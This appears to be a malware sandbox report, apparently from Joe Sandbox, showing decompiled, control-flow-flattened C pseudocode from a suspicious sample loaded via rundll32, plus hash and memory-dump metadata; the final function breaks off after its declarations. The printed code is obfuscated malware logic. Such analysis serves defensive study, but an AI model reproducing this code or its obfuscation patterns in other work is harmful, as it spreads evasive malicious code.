                                                                                                                      				_v104 = _v104 | 0x0d0d6548;
                                                                                                                      				_t62 =  &_v104; // 0xd0d6548
                                                                                                                      				_v104 =  *_t62 / _t266;
                                                                                                                      				_v104 = _v104 ^ 0x003eb00a;
                                                                                                                      				_v96 = 0x109237;
                                                                                                                      				_v96 = _v96 ^ 0x088082ff;
                                                                                                                      				_v96 = _v96 >> 1;
                                                                                                                      				_v96 = _v96 ^ 0xdcc593d2;
                                                                                                                      				_v96 = _v96 ^ 0xd88ac121;
                                                                                                                      				_v100 = 0xaca53b;
                                                                                                                      				_v100 = _v100 >> 0xc;
                                                                                                                      				_t267 = 0x53;
                                                                                                                      				_v100 = _v100 * 0x47;
                                                                                                                      				_v100 = _v100 + 0xffff22d9;
                                                                                                                      				_v100 = _v100 ^ 0x0009f7ae;
                                                                                                                      				_v60 = 0xde163e;
                                                                                                                      				_v60 = _v60 + 0xffffe594;
                                                                                                                      				_v60 = _v60 ^ 0x00de9d26;
                                                                                                                      				_v120 = 0x240793;
                                                                                                                      				_v120 = _v120 / _t267;
                                                                                                                      				_v120 = _v120 * 0x19;
                                                                                                                      				_v120 = _v120 + 0xd430;
                                                                                                                      				_v120 = _v120 ^ 0x0006e0c9;
                                                                                                                      				_v124 = 0xc58e86;
                                                                                                                      				_t268 = 0x65;
                                                                                                                      				_v124 = _v124 / _t268;
                                                                                                                      				_v124 = _v124 >> 0xb;
                                                                                                                      				_v124 = _v124 ^ 0x9d14b09a;
                                                                                                                      				_v124 = _v124 ^ 0x9d1ca329;
                                                                                                                      				_v64 = 0xc78ca0;
                                                                                                                      				_v64 = _v64 | 0xd15d632f;
                                                                                                                      				_v64 = _v64 ^ 0xd1d5a42f;
                                                                                                                      				_v128 = 0x79ba0a;
                                                                                                                      				_v128 = _v128 ^ 0x7ce03b8e;
                                                                                                                      				_v128 = _v128 + 0x4723;
                                                                                                                      				_v128 = _v128 >> 0xa;
                                                                                                                      				_v128 = _v128 ^ 0x00126e73;
                                                                                                                      				_v112 = 0x301104;
                                                                                                                      				_v112 = _v112 ^ 0x99cc29f1;
                                                                                                                      				_v112 = _v112 >> 0xb;
                                                                                                                      				_v112 = _v112 << 0xe;
                                                                                                                      				_v112 = _v112 ^ 0xcfe465e8;
                                                                                                                      				_v72 = 0xf18177;
                                                                                                                      				_v72 = _v72 + 0xffff968e;
                                                                                                                      				_v72 = _v72 + 0x6cf6;
                                                                                                                      				_v72 = _v72 ^ 0x00fdce33;
                                                                                                                      				_v76 = 0xd90ee1;
                                                                                                                      				_v76 = _v76 + 0xffffa364;
                                                                                                                      				_v76 = _v76 ^ 0x3c048803;
                                                                                                                      				_v76 = _v76 ^ 0x3cd13d13;
                                                                                                                      				_v116 = 0xc42f7d;
                                                                                                                      				_v116 = _v116 >> 2;
                                                                                                                      				_v116 = _v116 + 0x3407;
                                                                                                                      				_v116 = _v116 >> 7;
                                                                                                                      				_v116 = _v116 ^ 0x0009b6df;
                                                                                                                      				_v48 = 0xe39a19;
                                                                                                                      				_v48 = _v48 | 0x7412591d;
                                                                                                                      				_v48 = _v48 ^ 0x74ffcd98;
                                                                                                                      				_v80 = 0xc90483;
                                                                                                                      				_v80 = _v80 >> 1;
                                                                                                                      				_t269 = 0x17;
                                                                                                                      				_v80 = _v80 / _t269;
                                                                                                                      				_v80 = _v80 * 0x7d;
                                                                                                                      				_v80 = _v80 ^ 0x0220ab71;
                                                                                                                      				_v84 = 0xc67ab0;
                                                                                                                      				_v84 = _v84 >> 0xa;
                                                                                                                      				_v84 = _v84 * 3;
                                                                                                                      				_v84 = _v84 | 0xfb397840;
                                                                                                                      				_v84 = _v84 ^ 0xfb3c3624;
                                                                                                                      				_t304 = _v44;
                                                                                                                      				_t299 = _v44;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t307 = _t300 - 0x73106c8;
                                                                                                                      						if(_t307 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t307 == 0) {
                                                                                                                      							_t250 = E0018026B(_v96,  &_v40,  &_v32, _v100, _v60);
                                                                                                                      							_t305 = _t305 + 0xc;
                                                                                                                      							asm("sbb esi, esi");
                                                                                                                      							_t300 = ( ~_t250 & 0x022a085a) + 0x44dd11e;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 == 0xc1fb10) {
                                                                                                                      							_t300 = 0xde7de8b;
                                                                                                                      							if(_v44 > 2) {
                                                                                                                      								_t261 = E0018561F(_v68, _v104,  *((intOrPtr*)(_t299 + 8)),  &_v36);
                                                                                                                      								_v40 = _t261;
                                                                                                                      								if(_t261 != 0) {
                                                                                                                      									_t300 = 0x73106c8;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 == 0x37ef4f2) {
                                                                                                                      							_t304 = E0018E35A();
                                                                                                                      							_t300 = 0xc8dd531;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 == 0x44dd11e) {
                                                                                                                      							E001768DE(_v112, _v72, _v76, _v116, _v40);
                                                                                                                      							_t305 = _t305 + 0xc;
                                                                                                                      							_t300 = 0xde7de8b;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t300 != 0x677d978) {
                                                                                                                      							goto L21;
                                                                                                                      						} else {
                                                                                                                      							_t256 =  *0x19520c; // 0x0
                                                                                                                      							E0017F4BD(_v120, _v124, _t256 + 0x220, _v64, _v28, _v24 + 1, _v128);
                                                                                                                      							_t277 =  *0x19520c; // 0x0
                                                                                                                      							_t305 = _t305 + 0x14;
                                                                                                                      							_t262 = 1;
                                                                                                                      							_t300 = 0x44dd11e;
                                                                                                                      							 *((intOrPtr*)(_t277 + 0x210)) = _v32;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					if(_t300 == 0xc8dd531) {
                                                                                                                      						_t246 = E0017BC8A(_v88, _v52,  &_v44, _t304, _v56, _v92);
                                                                                                                      						_t299 = _t246;
                                                                                                                      						_t305 = _t305 + 0x10;
                                                                                                                      						if(_t246 == 0) {
                                                                                                                      							_t300 = 0xa73b483;
                                                                                                                      							goto L21;
                                                                                                                      						}
                                                                                                                      						_t300 = 0xc1fb10;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(_t300 == 0xde7de8b) {
                                                                                                                      						E0017FFF2(_v48, _v80, _v84, _t299);
                                                                                                                      						L24:
                                                                                                                      						return _t262;
                                                                                                                      					}
                                                                                                                      					if(_t300 != 0xfb124ba) {
                                                                                                                      						goto L21;
                                                                                                                      					}
                                                                                                                      					_t300 = 0x37ef4f2;
                                                                                                                      					goto L1;
                                                                                                                      					L21:
                                                                                                                      				} while (_t300 != 0xa73b483);
                                                                                                                      				goto L24;
                                                                                                                      			}


















































                                                                                                                      0x0017e480
                                                                                                                      0x0017e485
                                                                                                                      0x0017e48a
                                                                                                                      0x0017e492
                                                                                                                      0x0017e49a
                                                                                                                      0x0017e4a2
                                                                                                                      0x0017e4aa
                                                                                                                      0x0017e4b2
                                                                                                                      0x0017e4ba
                                                                                                                      0x0017e4c2
                                                                                                                      0x0017e4ca
                                                                                                                      0x0017e4d2
                                                                                                                      0x0017e4da
                                                                                                                      0x0017e4df
                                                                                                                      0x0017e4e7
                                                                                                                      0x0017e4ec
                                                                                                                      0x0017e4f4
                                                                                                                      0x0017e4fc
                                                                                                                      0x0017e504
                                                                                                                      0x0017e50c
                                                                                                                      0x0017e514
                                                                                                                      0x0017e51c
                                                                                                                      0x0017e51f
                                                                                                                      0x0017e528
                                                                                                                      0x0017e52c
                                                                                                                      0x0017e534
                                                                                                                      0x0017e53c
                                                                                                                      0x0017e546
                                                                                                                      0x0017e54a
                                                                                                                      0x0017e552
                                                                                                                      0x0017e55a
                                                                                                                      0x0017e55e
                                                                                                                      0x0017e55e
                                                                                                                      0x0017e562
                                                                                                                      0x0017e562
                                                                                                                      0x0017e562
                                                                                                                      0x0017e562
                                                                                                                      0x0017e568
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017e56e
                                                                                                                      0x0017e680
                                                                                                                      0x0017e685
                                                                                                                      0x0017e68c
                                                                                                                      0x0017e694
                                                                                                                      0x00000000
                                                                                                                      0x0017e694
                                                                                                                      0x0017e57a
                                                                                                                      0x0017e633
                                                                                                                      0x0017e638
                                                                                                                      0x0017e64e
                                                                                                                      0x0017e653
                                                                                                                      0x0017e65b
                                                                                                                      0x0017e661
                                                                                                                      0x0017e661
                                                                                                                      0x0017e65b
                                                                                                                      0x00000000
                                                                                                                      0x0017e638
                                                                                                                      0x0017e586
                                                                                                                      0x0017e622
                                                                                                                      0x0017e624
                                                                                                                      0x00000000
                                                                                                                      0x0017e624
                                                                                                                      0x0017e592
                                                                                                                      0x0017e607
                                                                                                                      0x0017e60c
                                                                                                                      0x0017e60f
                                                                                                                      0x00000000
                                                                                                                      0x0017e60f
                                                                                                                      0x0017e59a
                                                                                                                      0x00000000
                                                                                                                      0x0017e5a0
                                                                                                                      0x0017e5b8
                                                                                                                      0x0017e5cb
                                                                                                                      0x0017e5d0
                                                                                                                      0x0017e5df
                                                                                                                      0x0017e5e2
                                                                                                                      0x0017e5e3
                                                                                                                      0x0017e5e8
                                                                                                                      0x00000000
                                                                                                                      0x0017e5e8
                                                                                                                      0x0017e59a
                                                                                                                      0x0017e6a5
                                                                                                                      0x0017e6d7
                                                                                                                      0x0017e6dc
                                                                                                                      0x0017e6de
                                                                                                                      0x0017e6e3
                                                                                                                      0x0017e6ef
                                                                                                                      0x00000000
                                                                                                                      0x0017e6ef
                                                                                                                      0x0017e6e5
                                                                                                                      0x00000000
                                                                                                                      0x0017e6e5
                                                                                                                      0x0017e6ad
                                                                                                                      0x0017e70f
                                                                                                                      0x0017e719
                                                                                                                      0x0017e722
                                                                                                                      0x0017e722
                                                                                                                      0x0017e6b5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017e6b7
                                                                                                                      0x00000000
                                                                                                                      0x0017e6f4
                                                                                                                      0x0017e6f4
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #G$?=$He
                                                                                                                      • API String ID: 0-2298667298
                                                                                                                      • Opcode ID: ccf7a86146b84a08412256d4e4a903ebb1c929542f426867e46c592da0d922c1
                                                                                                                      • Instruction ID: 988b23f968dc1df1580f91e3937e859ae46280373a59df1ed65c6c0aca720368
                                                                                                                      • Opcode Fuzzy Hash: ccf7a86146b84a08412256d4e4a903ebb1c929542f426867e46c592da0d922c1
                                                                                                                      • Instruction Fuzzy Hash: AFC14FB68083809BC358CF65D48A40BFBF1BBD8758F50892DF59A96260D7B1D949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0017911A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v52;
                                                                                                                      				void* _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				intOrPtr _v100;
                                                                                                                      				char _v112;
                                                                                                                      				intOrPtr _v144;
                                                                                                                      				intOrPtr _v148;
                                                                                                                      				char _v156;
                                                                                                                      				char _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				void* _t162;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int _t184;
                                                                                                                      				void* _t198;
                                                                                                                      				void* _t200;
                                                                                                                      				void* _t202;
                                                                                                                      				intOrPtr _t207;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				void* _t235;
                                                                                                                      				void* _t236;
                                                                                                                      				void* _t238;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t162);
                                                                                                                      				_v68 = 0x6e7241;
                                                                                                                      				_t236 = _t235 + 0x10;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t198 = 0;
                                                                                                                      				_t200 = 0x513154f;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t231 = 0x5b;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v208 = 0x6dc976;
                                                                                                                      				_v208 = _v208 + 0xffff97e7;
                                                                                                                      				_v208 = _v208 << 0xf;
                                                                                                                      				_v208 = _v208 + 0xffff3ee4;
                                                                                                                      				_v208 = _v208 ^ 0xb0a037f9;
                                                                                                                      				_v216 = 0xefa27a;
                                                                                                                      				_v216 = _v216 * 0x2d;
                                                                                                                      				_v216 = _v216 << 0xe;
                                                                                                                      				_v216 = _v216 + 0x5c30;
                                                                                                                      				_v216 = _v216 ^ 0xe3d2b40e;
                                                                                                                      				_v192 = 0xd4fef0;
                                                                                                                      				_v192 = _v192 / _t231;
                                                                                                                      				_v192 = _v192 << 9;
                                                                                                                      				_v192 = _v192 ^ 0x04a09c26;
                                                                                                                      				_v172 = 0xfabcfe;
                                                                                                                      				_v172 = _v172 + 0xadb7;
                                                                                                                      				_v172 = _v172 ^ 0x00f6fe01;
                                                                                                                      				_v224 = 0xb5a285;
                                                                                                                      				_t232 = 0x43;
                                                                                                                      				_v224 = _v224 * 0x7a;
                                                                                                                      				_v224 = _v224 >> 1;
                                                                                                                      				_v224 = _v224 | 0x4641179d;
                                                                                                                      				_v224 = _v224 ^ 0x6f41a140;
                                                                                                                      				_v212 = 0x80e1bd;
                                                                                                                      				_v212 = _v212 / _t232;
                                                                                                                      				_v212 = _v212 << 9;
                                                                                                                      				_v212 = _v212 >> 0xc;
                                                                                                                      				_v212 = _v212 ^ 0x0005f6ff;
                                                                                                                      				_v220 = 0x3f6ee7;
                                                                                                                      				_v220 = _v220 >> 5;
                                                                                                                      				_v220 = _v220 << 0xf;
                                                                                                                      				_v220 = _v220 | 0x5ccf7ed2;
                                                                                                                      				_v220 = _v220 ^ 0xfdf08ccb;
                                                                                                                      				_v188 = 0x96b178;
                                                                                                                      				_v188 = _v188 * 0x33;
                                                                                                                      				_v188 = _v188 << 7;
                                                                                                                      				_v188 = _v188 ^ 0x02ac94c8;
                                                                                                                      				_v196 = 0x862d42;
                                                                                                                      				_v196 = _v196 | 0x17619c21;
                                                                                                                      				_v196 = _v196 ^ 0x73c665d7;
                                                                                                                      				_v196 = _v196 ^ 0x642dc428;
                                                                                                                      				_v176 = 0xd9c085;
                                                                                                                      				_v176 = _v176 | 0xddbc98a5;
                                                                                                                      				_v176 = _v176 ^ 0xddfc0835;
                                                                                                                      				_v180 = 0xc6bbdd;
                                                                                                                      				_v180 = _v180 * 0x34;
                                                                                                                      				_v180 = _v180 ^ 0x2850aa5e;
                                                                                                                      				_v168 = 0x548f7e;
                                                                                                                      				_v168 = _v168 << 2;
                                                                                                                      				_v168 = _v168 ^ 0x015ffca1;
                                                                                                                      				_v204 = 0x6ca805;
                                                                                                                      				_v204 = _v204 + 0x3ad1;
                                                                                                                      				_v204 = _v204 * 0x44;
                                                                                                                      				_v204 = _v204 ^ 0x1ce18dde;
                                                                                                                      				_v184 = 0x9ecbae;
                                                                                                                      				_v184 = _v184 << 5;
                                                                                                                      				_v184 = _v184 ^ 0x13d028d8;
                                                                                                                      				_t233 = _v184;
                                                                                                                      				_v200 = 0xbd8de1;
                                                                                                                      				_v200 = _v200 + 0xffffb408;
                                                                                                                      				_v200 = _v200 | 0x119192b9;
                                                                                                                      				_v200 = _v200 ^ 0x11b45be6;
                                                                                                                      				while(1) {
                                                                                                                      					_t238 = _t200 - 0x8a8a415;
                                                                                                                      					if(_t238 <= 0) {
                                                                                                                      					}
                                                                                                                      					L2:
                                                                                                                      					if(_t238 == 0) {
                                                                                                                      						_t176 = E0017CA43( &_v164, _v196, _v176, _v180,  &_v156, _v168);
                                                                                                                      						_t236 = _t236 + 0x10;
                                                                                                                      						asm("sbb ecx, ecx");
                                                                                                                      						_t200 = ( ~_t176 & 0x03566572) + 0x6fcaad9;
                                                                                                                      						continue;
                                                                                                                      						do {
                                                                                                                      							while(1) {
                                                                                                                      								_t238 = _t200 - 0x8a8a415;
                                                                                                                      								if(_t238 <= 0) {
                                                                                                                      								}
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      							L45:
                                                                                                                      							__eflags = _t200 - 0x409adf;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						L46:
                                                                                                                      						return _t198;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x1cefc96) {
                                                                                                                      						__eflags = _v148 - 1;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E0017472E( &_v112);
                                                                                                                      							L16:
                                                                                                                      							_t200 = 0xdce0ab1;
                                                                                                                      							while(1) {
                                                                                                                      								_t238 = _t200 - 0x8a8a415;
                                                                                                                      								if(_t238 <= 0) {
                                                                                                                      								}
                                                                                                                      								goto L2;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t200 = 0x6447723;
                                                                                                                      						while(1) {
                                                                                                                      							_t238 = _t200 - 0x8a8a415;
                                                                                                                      							if(_t238 <= 0) {
                                                                                                                      							}
                                                                                                                      							goto L25;
                                                                                                                      						}
                                                                                                                      						goto L2;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x26bd5bb) {
                                                                                                                      						__eflags = _v148 - 6;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E0018A429( &_v112);
                                                                                                                      							goto L16;
                                                                                                                      						}
                                                                                                                      						_t200 = 0xcc2cd30;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x513154f) {
                                                                                                                      						E001864C5(_v208, _v216, _v192, _v172, _a4,  &_v52);
                                                                                                                      						_t236 = _t236 + 0x10;
                                                                                                                      						_t200 = 0x7b50d2c;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x6447723) {
                                                                                                                      						__eflags = _v148 - 2;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E00185040( &_v112, _t233);
                                                                                                                      							goto L16;
                                                                                                                      						}
                                                                                                                      						_t200 = 0x92d00b6;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 == 0x6fcaad9) {
                                                                                                                      						_t184 = E0018B9B1(_v224, _v212, __eflags,  &_v164, _v220,  &_v52, _v188);
                                                                                                                      						_t236 = _t236 + 0x10;
                                                                                                                      						__eflags = _t184;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							goto L46;
                                                                                                                      						}
                                                                                                                      						L12:
                                                                                                                      						_t200 = 0x8a8a415;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t200 != 0x7b50d2c) {
                                                                                                                      						goto L45;
                                                                                                                      					}
                                                                                                                      					E00176A1F(0);
                                                                                                                      					L10:
                                                                                                                      					_t200 = 0x6fcaad9;
                                                                                                                      					continue;
                                                                                                                      					L25:
                                                                                                                      					__eflags = _t200 - 0x92d00b6;
                                                                                                                      					if(_t200 == 0x92d00b6) {
                                                                                                                      						__eflags = _v148 - 3;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E001788F4( &_v112);
                                                                                                                      							_t200 = 0xdce0ab1;
                                                                                                                      							goto L45;
                                                                                                                      						}
                                                                                                                      						_t200 = 0xe60179d;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xa53104b;
                                                                                                                      					if(_t200 == 0xa53104b) {
                                                                                                                      						_push(_t200);
                                                                                                                      						_push(_t200);
                                                                                                                      						_t202 = 0x44;
                                                                                                                      						_t233 = E00183512(_t202);
                                                                                                                      						__eflags = _t233;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							goto L12;
                                                                                                                      						}
                                                                                                                      						_t200 = 0x1cefc96;
                                                                                                                      						 *((intOrPtr*)(_t233 + 0x20)) = _v100;
                                                                                                                      						 *((intOrPtr*)(_t233 + 0x40)) = _v144;
                                                                                                                      						 *((intOrPtr*)(_t233 + 0x34)) = _v92;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xc419b15;
                                                                                                                      					if(_t200 == 0xc419b15) {
                                                                                                                      						__eflags = _v148 - 5;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E00180946( &_v112, _t233);
                                                                                                                      							goto L16;
                                                                                                                      						}
                                                                                                                      						_t200 = 0x26bd5bb;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xcc2cd30;
                                                                                                                      					if(_t200 == 0xcc2cd30) {
                                                                                                                      						__eflags = _v148 - 7;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E00177B82( &_v112);
                                                                                                                      						}
                                                                                                                      						goto L16;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xdce0ab1;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t207 =  *0x195c94; // 0x0
                                                                                                                      						_t198 = _t198 + 1;
                                                                                                                      						 *_t233 =  *(_t207 + 0x230);
                                                                                                                      						 *(_t207 + 0x230) = _t233;
                                                                                                                      						goto L10;
                                                                                                                      					}
                                                                                                                      					__eflags = _t200 - 0xe60179d;
                                                                                                                      					if(_t200 != 0xe60179d) {
                                                                                                                      						goto L45;
                                                                                                                      					}
                                                                                                                      					__eflags = _v148 - 4;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						E00172FA1( &_v112);
                                                                                                                      						goto L16;
                                                                                                                      					}
                                                                                                                      					_t200 = 0xc419b15;
                                                                                                                      				}
                                                                                                                      			}









































                                                                                                                      0x00179321
                                                                                                                      0x00179329
                                                                                                                      0x00179331
                                                                                                                      0x00179339
                                                                                                                      0x00179339
                                                                                                                      0x0017933b
                                                                                                                      0x0017933b
                                                                                                                      0x00179341
                                                                                                                      0x00179341
                                                                                                                      0x00179477
                                                                                                                      0x0017947c
                                                                                                                      0x00179483
                                                                                                                      0x0017948b
                                                                                                                      0x00179491
                                                                                                                      0x00179339
                                                                                                                      0x00179339
                                                                                                                      0x00179339
                                                                                                                      0x0017933b
                                                                                                                      0x0017933b
                                                                                                                      0x00000000
                                                                                                                      0x0017933b
                                                                                                                      0x001795b0
                                                                                                                      0x001795b0
                                                                                                                      0x001795b0
                                                                                                                      0x001795bf
                                                                                                                      0x001795c8
                                                                                                                      0x001795c8
                                                                                                                      0x0017934d
                                                                                                                      0x0017943f
                                                                                                                      0x00179444
                                                                                                                      0x00179457
                                                                                                                      0x001793e8
                                                                                                                      0x001793e8
                                                                                                                      0x00179339
                                                                                                                      0x00179339
                                                                                                                      0x0017933b
                                                                                                                      0x0017933b
                                                                                                                      0x00000000
                                                                                                                      0x0017933b
                                                                                                                      0x00179339
                                                                                                                      0x00179446
                                                                                                                      0x00179339
                                                                                                                      0x00179339
                                                                                                                      0x0017933b
                                                                                                                      0x0017933b
                                                                                                                      0x00000000
                                                                                                                      0x0017933b
                                                                                                                      0x00000000
                                                                                                                      0x00179339
                                                                                                                      0x00179359
                                                                                                                      0x00179420
                                                                                                                      0x00179425
                                                                                                                      0x00179438
                                                                                                                      0x00000000
                                                                                                                      0x00179438
                                                                                                                      0x00179427
                                                                                                                      0x00000000
                                                                                                                      0x00179427
                                                                                                                      0x00179365
                                                                                                                      0x0017940e
                                                                                                                      0x00179413
                                                                                                                      0x00179416
                                                                                                                      0x00000000
                                                                                                                      0x00179416
                                                                                                                      0x00179371
                                                                                                                      0x001793c9
                                                                                                                      0x001793ce
                                                                                                                      0x001793e3
                                                                                                                      0x00000000
                                                                                                                      0x001793e3
                                                                                                                      0x001793d0
                                                                                                                      0x00000000
                                                                                                                      0x001793d0
                                                                                                                      0x00179379
                                                                                                                      0x001793b2
                                                                                                                      0x001793b7
                                                                                                                      0x001793ba
                                                                                                                      0x001793bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001793c2
                                                                                                                      0x001793c2
                                                                                                                      0x00000000
                                                                                                                      0x001793c2
                                                                                                                      0x00179381
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00179389
                                                                                                                      0x0017938e
                                                                                                                      0x0017938e
                                                                                                                      0x00000000
                                                                                                                      0x00179496
                                                                                                                      0x00179496
                                                                                                                      0x0017949c
                                                                                                                      0x00179591
                                                                                                                      0x00179596
                                                                                                                      0x001795a9
                                                                                                                      0x001795ae
                                                                                                                      0x00000000
                                                                                                                      0x001795ae
                                                                                                                      0x00179598
                                                                                                                      0x00000000
                                                                                                                      0x00179598
                                                                                                                      0x001794a2
                                                                                                                      0x001794a8
                                                                                                                      0x00179556
                                                                                                                      0x00179557
                                                                                                                      0x0017955a
                                                                                                                      0x00179560
                                                                                                                      0x00179564
                                                                                                                      0x00179566
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00179573
                                                                                                                      0x00179578
                                                                                                                      0x0017957f
                                                                                                                      0x00179589
                                                                                                                      0x00000000
                                                                                                                      0x00179589
                                                                                                                      0x001794ae
                                                                                                                      0x001794b4
                                                                                                                      0x00179526
                                                                                                                      0x0017952b
                                                                                                                      0x00179540
                                                                                                                      0x00000000
                                                                                                                      0x00179540
                                                                                                                      0x0017952d
                                                                                                                      0x00000000
                                                                                                                      0x0017952d
                                                                                                                      0x001794b6
                                                                                                                      0x001794bc
                                                                                                                      0x0017950a
                                                                                                                      0x0017950f
                                                                                                                      0x0017951c
                                                                                                                      0x0017951c
                                                                                                                      0x00000000
                                                                                                                      0x0017950f
                                                                                                                      0x001794be
                                                                                                                      0x001794c0
                                                                                                                      0x001794f0
                                                                                                                      0x001794f6
                                                                                                                      0x001794fd
                                                                                                                      0x001794ff
                                                                                                                      0x00000000
                                                                                                                      0x001794ff
                                                                                                                      0x001794c2
                                                                                                                      0x001794c8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001794ce
                                                                                                                      0x001794d3
                                                                                                                      0x001794e6
                                                                                                                      0x00000000
                                                                                                                      0x001794e6
                                                                                                                      0x001794d5
                                                                                                                      0x001794d5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0\$Arn$n?
                                                                                                                      • API String ID: 0-1422779782
                                                                                                                      • Opcode ID: f8df196ffc9c9da02b775e68e72b20e381b6211da6489bab2dec14610818aed7
                                                                                                                      • Instruction ID: 454aa81c70a1aee00ae99c70d779b139d7dd35a5c73b46b469e18d6b41ea013f
                                                                                                                      • Opcode Fuzzy Hash: f8df196ffc9c9da02b775e68e72b20e381b6211da6489bab2dec14610818aed7
                                                                                                                      • Instruction Fuzzy Hash: 3BB17670508381DBC368DF24C59A52FBBF1FBD4358F548A1EF68A962A0D7709A48CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0017BD0F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				char _v16;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				char _v52;
                                                                                                                      				char _v68;
                                                                                                                      				char _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				char _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				void* _t208;
                                                                                                                      				signed int _t226;
                                                                                                                      				char* _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				void* _t231;
                                                                                                                      				signed int _t234;
                                                                                                                      				intOrPtr _t242;
